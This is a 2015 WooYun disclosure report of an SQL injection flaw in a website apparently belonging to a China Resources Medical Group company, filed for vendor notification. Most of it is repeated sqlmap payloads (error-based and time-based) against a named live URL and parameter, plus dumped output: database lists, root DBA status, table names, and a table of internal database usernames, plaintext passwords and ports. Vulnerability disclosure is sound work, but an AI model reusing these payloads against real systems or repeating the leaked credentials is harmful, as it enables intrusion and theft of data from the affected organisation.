当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135845

漏洞标题:华润医疗集团某公司存在SQL注入漏洞

相关厂商:华润医疗集团有限公司

漏洞作者: XTT

提交时间:2015-08-21 14:58

修复时间:2015-10-09 11:30

公开时间:2015-10-09 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-21: 细节已通知厂商并且等待厂商处理中
2015-08-25: 厂商已经确认,细节仅向厂商公开
2015-09-04: 细节向核心白帽子及相关领域专家公开
2015-09-14: 细节向普通白帽子公开
2015-09-24: 细节向实习白帽子公开
2015-10-09: 细节向公众公开

简要描述:

SQL注入,DBA权限,暴漏内部其他数据库,泄露重要信息

详细说明:

注入点:http://www.hrxaey.com/do/jsarticle.php?fid=69&type=pic&rows=4&leng=22&iframeID=article_Pictopic


---
Parameter: rows (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rows (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
available databases [9]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] performance_schema
[*] TD_OA
[*] TD_OA_ARCHIVE
[*] TRAIN
[*] v7_soft
---
Parameter: rows (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
current user: 'root@127.0.0.1'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---

漏洞证明:

部分重要信息

---
Parameter: rows (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: crscell
[216 tables]
+-------------------------+
| crs_archive_reportstate |
| crs_autocode |
| crs_chart |
| crs_codeindex |
| crs_codeitem |
| crs_columnindex |
| crs_database |
| crs_datatrace |
| crs_detailreadpriv |
| crs_detailwritepriv |
| crs_entrust |
| crs_formulas |
| crs_hyperlink |
| crs_logiccheck |
| crs_para |
| crs_parsecache |
| crs_pntpara |
| crs_readstate |
| crs_remind_log |
| crs_repkind |
| crs_report |
| crs_reportbulletin |
| crs_reportstate |
| crs_synsign |
| crs_tabledata158 |
| crs_tabledata159 |
+-------------------------+
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: crscell
Table: crs_database
[8 columns]
+--------+------------------+
| Column | Type |
+--------+------------------+
| user | varchar(50) |
| db | text |
| dbtype | varchar(10) |
| id | int(10) unsigned |
| label | tinytext |
| port | varchar(20) |
| pwd | varchar(50) |
| server | tinytext |
+--------+------------------+
暴漏企业关联数据库用户密码端口等信息:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: rows (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: crscell
Table: crs_database
[3 entries]
+--------+--------+--------+--------+---------+---------+-----------+
| user | db | dbtype | label | port | pwd | server |
+--------+--------+--------+--------+---------+---------+-----------+
| SYSTEM | HR | 4 | Oracle | <blank> | 111111 | ORCL |
| sa | rlzy30 | 0 | rlzy | 1433 | sa | localhost |
| root | TD_OA | 3 | TD_OA | 3336 | myoa888 | localhost |
+--------+--------+--------+--------+---------+---------+-----------+
---
Parameter: rows (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: mysql
Table: user
[42 columns]
+------------------------+------------------+
| Column | Type |
+------------------------+------------------+
| User | char(16) |
| Alter_priv | enum('N','Y') |
| Alter_routine_priv | enum('N','Y') |
| authentication_string | text |
| Create_priv | enum('N','Y') |
| Create_routine_priv | enum('N','Y') |
| Create_tablespace_priv | enum('N','Y') |
| Create_tmp_table_priv | enum('N','Y') |
| Create_user_priv | enum('N','Y') |
| Create_view_priv | enum('N','Y') |
| Delete_priv | enum('N','Y') |
| Drop_priv | enum('N','Y') |
| Event_priv | enum('N','Y') |
| Execute_priv | enum('N','Y') |
| File_priv | enum('N','Y') |
| Grant_priv | enum('N','Y') |
| Host | char(60) |
| Index_priv | enum('N','Y') |
| Insert_priv | enum('N','Y') |
| Lock_tables_priv | enum('N','Y') |
| max_connections | int(11) unsigned |
| max_questions | int(11) unsigned |
| max_updates | int(11) unsigned |
| max_user_connections | int(11) unsigned |
| Password | char(41) |
| plugin | char(64) |
| Process_priv | enum('N','Y') |
| References_priv | enum('N','Y') |
| Reload_priv | enum('N','Y') |
| Repl_client_priv | enum('N','Y') |
| Repl_slave_priv | enum('N','Y') |
| Select_priv | enum('N','Y') |
| Show_db_priv | enum('N','Y') |
| Show_view_priv | enum('N','Y') |
| Shutdown_priv | enum('N','Y') |
| ssl_cipher | blob |
| ssl_type | enum( |
| Super_priv | enum('N','Y') |
| Trigger_priv | enum('N','Y') |
| Update_priv | enum('N','Y') |
| x509_issuer | blob |
| x509_subject | blob |
+------------------------+------------------+
---
Parameter: rows (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(8027,CONCAT(0x5c,0x7162767871,(SELECT (CASE WHEN (8027=8027) THEN 1 ELSE 0 END)),0x717a787671)),1)&leng=22&iframeID=article_Pictopic
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: fid=69&type=pic&rows=4 PROCEDURE ANALYSE(EXTRACTVALUE(4257,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x576c5877))))),1)&leng=22&iframeID=article_Pictopic
---
web application technology: Apache
back-end DBMS: MySQL 5.1
Database: td_oa
[469 tables]
+----------------------------+
| session |
| user |
| version |
| address |
| address_group |
| affair |
| app_log |
| archive_tables |
| attachment |
| attachment_edit |
| attachment_module |
| attachment_position |
| attend_ask_duty |
| attend_config |
| attend_duty |
| attend_duty_shift |
| attend_evection |
| attend_holiday |
| attend_leave |
| attend_leave_manager |
| attend_machine |
| attend_manager |
| attend_out |
| attendance_overtime |
| bbs_board |
| bbs_comment |
+----------------------------+
重要信息还很多......就不再暴了
^_^还请厂商尽快修复,避免更多重要信息外漏~

修复方案:

版权声明:转载请注明来源 XTT@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-25 11:29

厂商回复:

感谢提交

最新状态:

暂无


漏洞评价:

评论